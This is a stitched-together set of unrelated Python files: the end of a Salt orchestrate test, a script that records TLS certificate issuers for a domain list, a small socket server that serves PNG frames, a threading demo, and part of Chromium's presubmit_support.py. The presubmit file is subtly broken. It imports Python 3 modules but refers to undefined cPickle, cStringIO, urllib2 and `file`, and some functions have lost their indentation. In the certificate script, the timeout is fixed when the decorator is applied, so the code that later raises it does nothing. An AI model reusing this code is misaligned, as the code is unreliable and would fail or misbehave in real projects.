            # Run for real to create the file
            self.run_run_plus(
                'state.orchestrate',
                'orch',
                __reload_config=True).get('jid')
            # Run again in test mode. Since there were no changes, the
            # requisites should not fire.
            jid2 = self.run_run_plus(
                'state.orchestrate',
                'orch',
                test=True,
                __reload_config=True).get('jid')
        finally:
            try:
                os.remove(os.path.join(TMP, 'orch.req_test'))
            except OSError:
                pass
        assert jid1 is not None
        assert jid2 is not None
        tags = {'salt/run/{0}/ret'.format(x): x for x in (jid1, jid2)}
        ret = {}
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                if event['tag'] in tags:
                    ret[tags.pop(event['tag'])] = self.repack_state_returns(
                        event['data']['return']['data']['master']
                    )
                    if not tags:
                        # If tags is empty, we've grabbed all the returns we
                        # wanted, so let's stop listening to the event bus.
                        break
        finally:
            del listener
            signal.alarm(0)
        for sls_id in ('manage_a_file', 'do_onchanges', 'do_prereq'):
            # The first time through, all three states should have a None
            # result, while the second time through, they should all have a
            # True result.
            assert ret[jid1][sls_id]['result'] is None, \
                'result of {0} ({1}) is not None'.format(
                    sls_id,
                    ret[jid1][sls_id]['result'])
            assert ret[jid2][sls_id]['result'] is True, \
                'result of {0} ({1}) is not True'.format(
                    sls_id,
                    ret[jid2][sls_id]['result'])
        # The file.managed state should have shown changes in the test mode
        # return data.
        assert ret[jid1]['manage_a_file']['changes']
        # After the file was created, running again in test mode should have
        # shown no changes.
        assert not ret[jid2]['manage_a_file']['changes'], \
            ret[jid2]['manage_a_file']['changes']
|
ca.py | import ssl
import socket
import OpenSSL
import sqlite3
import signal
from functools import wraps
from numpy.core.numeric import count_nonzero
import requests
from multiprocessing import Process, Value
# Shared (multiprocessing) state: current alarm timeout in seconds, the
# maximum number of attempts per domain, and a running row counter.
TIMEOUT = Value('i', 5)
cMax = Value('i', 2)
ca_num = Value('i', 0)
class TimeoutException(Exception):
    """Raised by the SIGALRM handler when a deadline() timer expires."""
    pass
def deadline(timeout, *args):
    """Decorator factory: abort the wrapped call with TimeoutException after
    `timeout` seconds, using SIGALRM (Unix only, main thread only).

    Args:
        timeout: deadline in whole seconds passed to signal.alarm().
    Returns:
        A decorator preserving the wrapped function's metadata.
    Raises (from the wrapped call):
        TimeoutException: if the call does not finish within `timeout`.
    """
    def decorate(f):
        def handler(signum, frame):
            # Fires inside the interrupted frame when the alarm goes off.
            raise TimeoutException()
        # BUG FIX: wraps() must receive the wrapped function `f`; the original
        # passed the `timeout` int, silently losing __name__/__doc__ metadata.
        @wraps(f)
        def new_f(*args):
            signal.signal(signal.SIGALRM, handler)  # link SIGALRM to the handler
            signal.alarm(timeout)                   # arm a timeout-second alarm
            try:
                return f(*args)
            finally:
                # Always disarm, even when f() raises -- otherwise a stale
                # alarm could fire later in unrelated code.
                signal.alarm(0)
        return new_f
    return decorate
@deadline(TIMEOUT.value)
def get_certificate(host, port=443, timeout=10):
    """Fetch the peer certificate of host:port and return it PEM-encoded."""
    # Verification is deliberately disabled: we only want to read the cert,
    # not validate the chain.
    ctx = ssl.create_default_context()
    ctx.set_ciphers('DEFAULT:@SECLEVEL=1')
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    raw_sock = socket.create_connection((host, port))
    tls_sock = ctx.wrap_socket(raw_sock, server_hostname=host)
    tls_sock.settimeout(timeout)
    try:
        der_cert = tls_sock.getpeercert(True)
    finally:
        tls_sock.close()
    return ssl.DER_cert_to_PEM_cert(der_cert)
@deadline(60)
def url_direct(user):
    """Follow redirects via GET and return the final hostname."""
    final_url = requests.get('http://' + user).url
    return final_url.split('/')[2]
@deadline(60)
def url_with_header(user):
    """Return the hostname from the Location header of a HEAD request."""
    location = requests.head('http://' + user).headers['location']
    return location.split('/')[2]
def get_url(user, counter, error):
    """Resolve the real hostname behind `user` by following HTTP redirects.

    On failure, records an error row in the `errors` table and returns the
    counter advanced to the last retry slot so the caller stops retrying.
    Returns a (possibly rewritten user, counter) tuple.
    """
    def _log_failure(note):
        print(note, user)
        cur.execute("INSERT INTO errors VALUES (?, ?, ?)",
                    (user, user.split('.')[-1], error))

    try:
        return url_direct(user), counter
    except TimeoutException:
        _log_failure(" Impossible to get url (TimeoutException) from ")
        return user, cMax.value - 1
    except:
        # GET failed for another reason; fall back to reading the
        # Location header from a HEAD request.
        try:
            return url_with_header(user), counter
        except TimeoutException:
            _log_failure(" Impossible to get url (TimeoutException) from ")
            return user, cMax.value - 1
        except:
            _log_failure(" Impossible to get url from ")
            return user, cMax.value - 1
def processus(user):
    """Look up `user`'s TLS certificate issuer and store it in the `ca` table.

    Retries up to cMax attempts. On the last timed-out attempt the shared
    TIMEOUT is raised to 60s once and the attempt counter restarts; on other
    failures the domain is rewritten via get_url() before the next try.
    Terminal failures are logged to the `errors` table. Runs in a child
    Process (see the script body below).
    """
    counter = 0  # attempts used so far
    ok = False
    while ok == False:
        try:
            certificate = get_certificate(user)
            x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, certificate)
            provider = x509.get_issuer().organizationName
            cur.execute("INSERT INTO ca VALUES (?, ?, ?)", (user, provider, ca_num.value))
            print(user, ": ", provider)
            ok = True
        except TimeoutException as e:
            if (counter == cMax.value-1):
                if (TIMEOUT.value != 60):
                    # Last regular attempt timed out: retry with a 60s
                    # deadline and reset the attempt counter to zero.
                    TIMEOUT.value = 60
                    counter -= counter
                else:
                    # Already at the long deadline: give up and log.
                    cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], repr(e)))
            else:
                # Maybe only the redirect target answers; rewrite `user`
                # before the next attempt.
                user, counter = get_url(user, counter, repr(e))
                print(" ", repr(e), user)
            ok = False
            counter += 1
        except Exception as e:
            if (counter == cMax.value-1):
                cur.execute("INSERT INTO errors VALUES (?, ?, ?)", (user, user.split('.')[len(user.split('.'))-1], repr(e)))
            else:
                user, counter = get_url(user, counter, repr(e))
                print(" ", repr(e), user)
            ok = False
            counter += 1
        finally:
            # NOTE(review): ca_num is incremented on every attempt, not only
            # on success -- confirm the numbering is meant to count attempts.
            con.commit()
            ca_num.value += 1
            if counter == cMax.value:
                # All attempts exhausted: leave the loop.
                ok = True
# --- Script body: (re)create the SQLite tables, then scan every domain. ---
con = sqlite3.connect('ca-providers.db')
cur = con.cursor()
try:
    cur.execute("CREATE TABLE ca (ca_user, ca_provider, ca_num)")
except sqlite3.OperationalError:
    # Table already exists from a previous run: just empty it.
    cur.execute("DELETE FROM ca")
try:
    cur.execute("CREATE TABLE errors (user, extension, error)")
except sqlite3.OperationalError:
    cur.execute("DELETE FROM errors")
con.commit()
debut = 0  # NOTE(review): unused -- possibly a leftover resume offset.
with open("list1m2020.csv", "r") as f:
    for line in f:
        # Each line starts with the domain name.
        user = line.split()[0]
        # One child process per domain; join() keeps the scan sequential.
        # NOTE(review): the child inherits `con`/`cur` via fork and commits
        # on its own copy of the connection -- confirm this persistence
        # model is intentional.
        p = Process(target=processus, args=(user,))
        p.start()
        p.join()
        if (TIMEOUT.value != 5):
            # processus may have raised the shared deadline to 60s; restore.
            TIMEOUT.value = 5
con.close()
serving.py | """Socket server."""
import logging
import socketserver
import threading
import animation
_PORT = 7829
_logger = logging.getLogger('subway_board.serving')
class _TCPServer(socketserver.TCPServer):
    # Allow quick restarts without waiting for TIME_WAIT sockets to clear.
    allow_reuse_address = True
class Server:
    """Socket server that sends current frame from ETA image on every connection."""

    def __init__(self, port: int, animator: animation.Animator):
        self._port = port
        self._animator = animator

        class Handler(socketserver.StreamRequestHandler):
            """Handle TCP requests."""

            def handle(self) -> None:
                # Now wait for the next frame before sending data. This could be a
                # few seconds or immediate, depending on whether the animation is
                # currently static or in scroll.
                # `animator` is captured by closure from the enclosing
                # __init__ scope (not via self).
                frame = animator.wait_for_new_frame()
                # NOTE(review): frame appears to be a PIL Image (it has
                # save(..., 'PNG')) -- confirm against Animator's contract.
                frame.save(self.wfile, 'PNG', optimize=True)

        self._handler_class = Handler

    def start(self) -> None:
        """Starts the socket server in a background thread."""
        threading.Thread(target=self._start, daemon=True).start()

    def _start(self) -> None:
        """Serves the current frame on any socket connection."""
        _logger.info('Waiting for the animator to be ready to produce frames...')
        self._animator.event_ready.wait()
        _logger.info('... ready!')
        with _TCPServer(('0.0.0.0', self._port), self._handler_class) as server:
            _logger.info('Listening on port %d', self._port)
            server.serve_forever()
|
tfoo.py | import threading
import pub_foo
def say_hello(msg):
    """Print a greeting naming the calling context (e.g. 'module')."""
    greeting = 'Say hello from %s' % msg
    print(greeting)
def test():
    # Exercise the proxy from a function-level caller on a separate thread.
    threading.Thread(target=pub_foo.proxy_say_hello, args=('function',)).start()
if __name__ == '__main__':
    # Exercise the proxy from module level, then via test().
    threading.Thread(target=pub_foo.proxy_say_hello, args=('module',)).start()
    test()
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import pickle # Exposed through the API.
import cpplint
import io # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib.request, urllib.error, urllib.parse # Exposed through the API.
import urllib.parse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_utils # Exposed through the API
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
    """Raised when a presubmit script itself is broken or cannot run."""
    pass
class CommandData(object):
    """Bundles everything needed to run one external test command.

    Stdout/stderr are merged into a single pipe and stdin is piped so the
    caller can feed `self.stdin` to the process.
    """
    def __init__(self, name, cmd, kwargs, message):
        self.name = name
        self.cmd = cmd
        # Data to feed the process; the Popen kwarg itself becomes a PIPE.
        self.stdin = kwargs.get('stdin', None)
        self.kwargs = kwargs
        self.kwargs.update(
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            stdin=subprocess.PIPE,
        )
        self.message = message
        self.info = None
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
    """Tracks SIGINT across the main process and its subprocesses.

    Installs a SIGINT handler at construction time. wait(p, stdin) behaves
    like p.communicate(stdin) until a SIGINT is seen anywhere, after which
    waited-on processes are terminated and ProcessWasInterrupted is raised.
    """
    class ProcessWasInterrupted(Exception):
        # Raised by wait() once a SIGINT has been observed.
        pass
    # Return codes that mean "killed by SIGINT".
    sigint_returncodes = {-signal.SIGINT,  # Unix
                          -1073741510,  # Windows
                          }
    def __init__(self):
        self.__lock = threading.Lock()
        # Live subprocesses to terminate if a SIGINT arrives.
        self.__processes = set()
        self.__got_sigint = False
        signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
    def __on_sigint(self):
        # Caller must hold self.__lock.
        self.__got_sigint = True
        while self.__processes:
            try:
                self.__processes.pop().terminate()
            except OSError:
                # Process already exited; nothing to do.
                pass
    def interrupt(self):
        with self.__lock:
            self.__on_sigint()
    def got_sigint(self):
        with self.__lock:
            return self.__got_sigint
    def wait(self, p, stdin):
        """communicate() with p, honoring any SIGINT seen before or during."""
        with self.__lock:
            if self.__got_sigint:
                p.terminate()
            self.__processes.add(p)
        stdout, stderr = p.communicate(stdin)
        code = p.returncode
        with self.__lock:
            self.__processes.discard(p)
            if code in self.sigint_returncodes:
                # The subprocess itself was killed by Ctrl+C.
                self.__on_sigint()
            if self.__got_sigint:
                raise self.ProcessWasInterrupted
        return stdout, stderr
# Module-level singleton; installs the SIGINT handler on import.
sigint_handler = SigintHandler()
class ThreadPool(object):
    """Runs queued CommandData tests, optionally on parallel worker threads."""
    def __init__(self, pool_size=None):
        # Defaults to one worker per CPU.
        self._pool_size = pool_size or multiprocessing.cpu_count()
        self._messages = []
        self._messages_lock = threading.Lock()
        self._tests = []
        self._tests_lock = threading.Lock()
        self._nonparallel_tests = []
    def CallCommand(self, test):
        """Runs an external program.
        This function converts invocation of .py files and invocations of "python"
        to vpython invocations.
        Returns a result message on failure, test.info on success, else None.
        """
        vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
        cmd = test.cmd
        if cmd[0] == 'python':
            # Copy before mutating so the caller's list is untouched.
            cmd = list(cmd)
            cmd[0] = vpython
        elif cmd[0].endswith('.py'):
            cmd = [vpython] + cmd
        try:
            start = time.time()
            p = subprocess.Popen(cmd, **test.kwargs)
            stdout, _ = sigint_handler.wait(p, test.stdin)
            duration = time.time() - start
        except OSError as e:
            duration = time.time() - start
            return test.message(
                '%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
        if p.returncode != 0:
            return test.message(
                '%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
        if test.info:
            return test.info('%s (%4.2fs)' % (test.name, duration))
    def AddTests(self, tests, parallel=True):
        # Queue tests; non-parallel ones run first, serially, in RunAsync.
        if parallel:
            self._tests.extend(tests)
        else:
            self._nonparallel_tests.extend(tests)
    def RunAsync(self):
        """Runs all queued tests; returns the accumulated result messages."""
        self._messages = []
        def _WorkerFn():
            # Drain the shared queue until empty.
            while True:
                test = None
                with self._tests_lock:
                    if not self._tests:
                        break
                    test = self._tests.pop()
                result = self.CallCommand(test)
                if result:
                    with self._messages_lock:
                        self._messages.append(result)
        def _StartDaemon():
            t = threading.Thread(target=_WorkerFn)
            t.daemon = True
            t.start()
            return t
        # Serial tests first -- they may not tolerate concurrency.
        while self._nonparallel_tests:
            test = self._nonparallel_tests.pop()
            result = self.CallCommand(test)
            if result:
                self._messages.append(result)
        if self._tests:
            threads = [_StartDaemon() for _ in range(self._pool_size)]
            for worker in threads:
                worker.join()
        return self._messages
def normpath(path):
    '''Version of os.path.normpath that also changes backward slashes to
    forward slashes when not running on Windows.
    '''
    # This is safe to always do because the Windows version of
    # os.path.normpath replaces forward slashes with backward slashes anyway.
    return os.path.normpath(path.replace(os.sep, '/'))
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
    """Accumulates presubmit output and tracks whether any check failed."""
    def __init__(self, input_stream=None, output_stream=None):
        self.input_stream = input_stream
        self.output_stream = output_stream
        self.reviewers = []
        self.more_cc = []
        self.written_output = []
        self.error_count = 0
    def prompt_yes_no(self, prompt_string):
        """Ask the user to confirm; anything but 'y'/'yes' counts as failure."""
        self.write(prompt_string)
        if not self.input_stream:
            # No way to ask -- treat as a refusal.
            self.fail()
            return
        answer = self.input_stream.readline().strip().lower()
        if answer not in ('y', 'yes'):
            self.fail()
    def fail(self):
        self.error_count += 1
    def should_continue(self):
        # True while no check has failed.
        return self.error_count == 0
    def write(self, s):
        # Keep a copy so getvalue() works even without an output stream.
        self.written_output.append(s)
        if self.output_stream:
            self.output_stream.write(s)
    def getvalue(self):
        return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
    """A hard presubmit error."""
    # Fatal results make PresubmitOutput.fail() fire in handle().
    fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
    """A warning that prompts the user if they want to continue."""
    should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
    """Just print something to the screen -- but it's not even a warning."""
    pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
    """A warning that should be included in the review request email."""
    def __init__(self, *args, **kwargs):
        # Deliberately unusable: constructing this class always raises.
        # NOTE(review): super().__init__() omits the required `message`
        # argument, so a TypeError fires before the NotImplementedError
        # below -- confirm which exception is intended.
        super(_MailTextResult, self).__init__()
        raise NotImplementedError()
class GerritAccessor(object):
    """Limited Gerrit functionality for canned presubmit checks to work.
    To avoid excessive Gerrit calls, caches the results.
    """
    def __init__(self, host):
        # host: the Gerrit host name to query.
        self.host = host
        # issue number (int) -> change-detail dict, filled lazily.
        self.cache = {}
    def _FetchChangeDetail(self, issue):
        # Separate function to be easily mocked in tests.
        try:
            return gerrit_util.GetChangeDetail(
                self.host, str(issue),
                ['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
        except gerrit_util.GerritError as e:
            if e.http_status == 404:
                raise Exception('Either Gerrit issue %s doesn\'t exist, or '
                                'no credentials to fetch issue details' % issue)
            raise
    def GetChangeInfo(self, issue):
        """Returns labels and all revisions (patchsets) for this issue.
        The result is a dictionary according to Gerrit REST Api.
        https://gerrit-review.googlesource.com/Documentation/rest-api.html
        However, API isn't very clear what's inside, so see tests for example.
        """
        assert issue
        cache_key = int(issue)
        if cache_key not in self.cache:
            self.cache[cache_key] = self._FetchChangeDetail(issue)
        return self.cache[cache_key]
    def GetChangeDescription(self, issue, patchset=None):
        """If patchset is none, fetches current patchset."""
        info = self.GetChangeInfo(issue)
        # info is a reference to cache. We'll modify it here adding description to
        # it to the right patchset, if it is not yet there.
        # Find revision info for the patchset we want.
        if patchset is not None:
            for rev, rev_info in info['revisions'].items():
                if str(rev_info['_number']) == str(patchset):
                    break
            else:
                raise Exception('patchset %s doesn\'t exist in issue %s' % (
                    patchset, issue))
        else:
            rev = info['current_revision']
            rev_info = info['revisions'][rev]
        return rev_info['commit']['message']
    def GetDestRef(self, issue):
        # Returns the fully-qualified destination ref of the change's branch.
        ref = self.GetChangeInfo(issue)['branch']
        if not ref.startswith('refs/'):
            # NOTE: it is possible to create 'refs/x' branch,
            # aka 'refs/heads/refs/x'. However, this is ill-advised.
            ref = 'refs/heads/%s' % ref
        return ref
    def GetChangeOwner(self, issue):
        # Email address of the change owner.
        return self.GetChangeInfo(issue)['owner']['email']
    def GetChangeReviewers(self, issue, approving_only=True):
        """Returns reviewer emails; with approving_only, only those who set
        the maximum Code-Review value."""
        changeinfo = self.GetChangeInfo(issue)
        if approving_only:
            labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
            values = list(labelinfo.get('values', {}).keys())
            try:
                max_value = max(int(v) for v in values)
                reviewers = [r for r in labelinfo.get('all', [])
                             if r.get('value', 0) == max_value]
            except ValueError:  # values is the empty list
                reviewers = []
        else:
            reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
        return [r.get('email') for r in reviewers]
class OutputApi(object):
    """An instance of OutputApi gets passed to presubmit scripts so that they
    can output various types of results.
    """
    # Result classes re-exported for presubmit scripts (top-level classes so
    # multiprocessing can pickle them).
    PresubmitResult = _PresubmitResult
    PresubmitError = _PresubmitError
    PresubmitPromptWarning = _PresubmitPromptWarning
    PresubmitNotifyResult = _PresubmitNotifyResult
    MailTextResult = _MailTextResult
    def __init__(self, is_committing):
        # is_committing: True when the change is being committed, False when
        # it is being uploaded.
        self.is_committing = is_committing
        # Extra addresses to CC on the change, filled in by checks.
        self.more_cc = []
    def AppendCC(self, cc):
        """Appends a user to cc for this change."""
        self.more_cc.append(cc)
    def PresubmitPromptOrNotify(self, *args, **kwargs):
        """Warn the user when uploading, but only notify if committing."""
        if self.is_committing:
            return self.PresubmitNotifyResult(*args, **kwargs)
        return self.PresubmitPromptWarning(*args, **kwargs)
    def EnsureCQIncludeTrybotsAreAdded(self, cl, bots_to_include, message):
        """Helper for any PostUploadHook wishing to add CQ_INCLUDE_TRYBOTS.
        Merges the bots_to_include into the current CQ_INCLUDE_TRYBOTS list,
        keeping it alphabetically sorted. Returns the results that should be
        returned from the PostUploadHook.
        Args:
          cl: The git_cl.Changelist object.
          bots_to_include: A list of strings of bots to include, in the form
            "master:slave".
          message: A message to be printed in the case that
            CQ_INCLUDE_TRYBOTS was updated.
        """
        description = cl.GetDescription(force=True)
        trybot_footers = git_footers.parse_footers(description).get(
            git_footers.normalize_name('Cq-Include-Trybots'), [])
        prior_bots = []
        for f in trybot_footers:
            prior_bots += [b.strip() for b in f.split(';') if b.strip()]
        # Nothing to do when every requested bot is already listed.
        if set(prior_bots) >= set(bots_to_include):
            return []
        all_bots = ';'.join(sorted(set(prior_bots) | set(bots_to_include)))
        description = git_footers.remove_footer(description, 'Cq-Include-Trybots')
        description = git_footers.add_footer(
            description, 'Cq-Include-Trybots', all_bots,
            before_keys=['Change-Id'])
        cl.UpdateDescription(description, force=True)
        return [self.PresubmitNotifyResult(message)]
class InputApi(object):
  """An instance of this object is passed to presubmit scripts so they can
  know stuff about the change they're looking at.
  """
  # Method could be a function
  # pylint: disable=no-self-use

  # File extensions that are considered source files from a style guide
  # perspective. Don't modify this list from a presubmit script!
  #
  # Files without an extension aren't included in the list. If you want to
  # filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
  # Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
  DEFAULT_WHITE_LIST = (
      # C++ and friends
      r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
      r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
      # Scripts
      r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
      # Other
      r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
      r".+\.fidl$"
  )

  # Path regexp that should be excluded from being considered containing source
  # files. Don't modify this list from a presubmit script!
  DEFAULT_BLACK_LIST = (
      r"testing_support[\\\/]google_appengine[\\\/].*",
      r".*\bexperimental[\\\/].*",
      # Exclude third_party/.* but NOT third_party/{WebKit,blink}
      # (crbug.com/539768 and crbug.com/836555).
      r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
      # Output directories (just in case)
      r".*\bDebug[\\\/].*",
      r".*\bRelease[\\\/].*",
      r".*\bxcodebuild[\\\/].*",
      r".*\bout[\\\/].*",
      # All caps files like README and LICENCE.
      r".*\b[A-Z0-9_]{2,}$",
      # SCM (can happen in dual SCM configuration). (Slightly over aggressive)
      r"(|.*[\\\/])\.git[\\\/].*",
      r"(|.*[\\\/])\.svn[\\\/].*",
      # There is no point in processing a patch file.
      r".+\.diff$",
      r".+\.patch$",
  )

  def __init__(self, change, presubmit_path, is_committing,
               verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
    """Builds an InputApi object.

    Args:
      change: A presubmit.Change object.
      presubmit_path: The path to the presubmit script being processed.
      is_committing: True if the change is about to be committed.
      verbose: Prints debug info.
      gerrit_obj: provides basic Gerrit codereview functionality.
      dry_run: if true, some Checks will be skipped.
      thread_pool: shared ThreadPool that queued tests run on; a private pool
        is created when none is supplied.
      parallel: if true, all tests reported via input_api.RunTests for all
        PRESUBMIT files will be run in parallel.
    """
    # Version number of the presubmit_support script.
    self.version = [int(x) for x in __version__.split('.')]
    self.change = change
    self.is_committing = is_committing
    self.gerrit = gerrit_obj
    self.dry_run = dry_run

    self.parallel = parallel
    self.thread_pool = thread_pool or ThreadPool()

    # We expose various modules and functions as attributes of the input_api
    # so that presubmit scripts don't have to import them.
    # NOTE: cPickle/cStringIO/urllib2 and the `file` builtin used below are
    # Python 2 APIs; this module targets Python 2.
    self.ast = ast
    self.basename = os.path.basename
    self.cPickle = cPickle
    self.cpplint = cpplint
    self.cStringIO = cStringIO
    self.fnmatch = fnmatch
    self.gclient_utils = gclient_utils
    self.glob = glob.glob
    self.json = json
    self.logging = logging.getLogger('PRESUBMIT')
    self.marshal = marshal
    self.os_listdir = os.listdir
    self.os_path = os.path
    self.os_stat = os.stat
    self.os_walk = os.walk
    self.pickle = pickle
    self.re = re
    self.subprocess = subprocess
    self.tempfile = tempfile
    self.time = time
    self.traceback = traceback
    self.unittest = unittest
    self.urllib2 = urllib2

    self.is_windows = sys.platform == 'win32'

    # Set python_executable to 'python'. This is interpreted in CallCommand to
    # convert to vpython in order to allow scripts in other repos (e.g. src.git)
    # to automatically pick up that repo's .vpython file, instead of inheriting
    # the one in depot_tools.
    self.python_executable = 'python'
    self.environ = os.environ

    # InputApi.platform is the platform you're currently running on.
    self.platform = sys.platform

    self.cpu_count = multiprocessing.cpu_count()

    # The local path of the currently-being-processed presubmit script.
    self._current_presubmit_path = os.path.dirname(presubmit_path)

    # We carry the canned checks so presubmit scripts can easily use them.
    self.canned_checks = presubmit_canned_checks

    # Temporary files we must manually remove at the end of a run.
    self._named_temporary_files = []

    # TODO(dpranke): figure out a list of all approved owners for a repo
    # in order to be able to handle wildcard OWNERS files?
    self.owners_db = owners.Database(change.RepositoryRoot(),
                                     fopen=file, os_path=self.os_path)
    self.owners_finder = owners_finder.OwnersFinder
    self.verbose = verbose
    self.Command = CommandData

    # Replace <hash_map> and <hash_set> as headers that need to be included
    # with "base/containers/hash_tables.h" instead.
    # Access to a protected member _XX of a client class
    # pylint: disable=protected-access
    self.cpplint._re_pattern_templates = [
      (a, b, 'base/containers/hash_tables.h')
      if header in ('<hash_map>', '<hash_set>') else (a, b, header)
      for (a, b, header) in cpplint._re_pattern_templates
    ]

  def PresubmitLocalPath(self):
    """Returns the local path of the presubmit script currently being run.

    This is useful if you don't want to hard-code absolute paths in the
    presubmit script.  For example, It can be used to find another file
    relative to the PRESUBMIT.py script, so the whole tree can be branched and
    the presubmit script still works, without editing its content.
    """
    return self._current_presubmit_path

  def AffectedFiles(self, include_deletes=True, file_filter=None):
    """Same as input_api.change.AffectedFiles() except only lists files
    (and optionally directories) in the same directory as the current presubmit
    script, or subdirectories thereof.
    """
    dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
    # A one-character path means the presubmit script sits at the repo root,
    # in which case every affected file matches.
    if len(dir_with_slash) == 1:
      dir_with_slash = ''

    return [x for x in self.change.AffectedFiles(include_deletes, file_filter) if normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash)]

  def LocalPaths(self):
    """Returns local paths of input_api.AffectedFiles()."""
    paths = [af.LocalPath() for af in self.AffectedFiles()]
    logging.debug("LocalPaths: %s", paths)
    return paths

  def AbsoluteLocalPaths(self):
    """Returns absolute local paths of input_api.AffectedFiles()."""
    return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]

  def AffectedTestableFiles(self, include_deletes=None, **kwargs):
    """Same as input_api.change.AffectedTestableFiles() except only lists files
    in the same directory as the current presubmit script, or subdirectories
    thereof.
    """
    if include_deletes is not None:
      warn("AffectedTestableFiles(include_deletes=%s)"
               " is deprecated and ignored" % str(include_deletes),
           category=DeprecationWarning,
           stacklevel=2)
    return [x for x in self.AffectedFiles(include_deletes=False, **kwargs) if x.IsTestableFile()]

  def AffectedTextFiles(self, include_deletes=None):
    """An alias to AffectedTestableFiles for backwards compatibility."""
    return self.AffectedTestableFiles(include_deletes=include_deletes)

  def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
    """Filters out files that aren't considered "source file".

    If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
    and InputApi.DEFAULT_BLACK_LIST is used respectively.

    The lists will be compiled as regular expression and
    AffectedFile.LocalPath() needs to pass both list.

    Note: Copy-paste this function to suit your needs or use a lambda function.
    """
    def Find(affected_file, items):
      # True when any pattern matches the file's local path.
      local_path = affected_file.LocalPath()
      for item in items:
        if self.re.match(item, local_path):
          return True
      return False
    return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
            not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))

  def AffectedSourceFiles(self, source_file):
    """Filter the list of AffectedTestableFiles by the function source_file.

    If source_file is None, InputApi.FilterSourceFile() is used.
    """
    if not source_file:
      source_file = self.FilterSourceFile
    return list(filter(source_file, self.AffectedTestableFiles()))

  def RightHandSideLines(self, source_file_filter=None):
    """An iterator over all text lines in "new" version of changed files.

    Only lists lines from new or modified text files in the change that are
    contained by the directory of the currently executing presubmit script.

    This is useful for doing line-by-line regex checks, like checking for
    trailing whitespace.

    Yields:
      a 3 tuple:
        the AffectedFile instance of the current file;
        integer line number (1-based); and
        the contents of the line as a string.

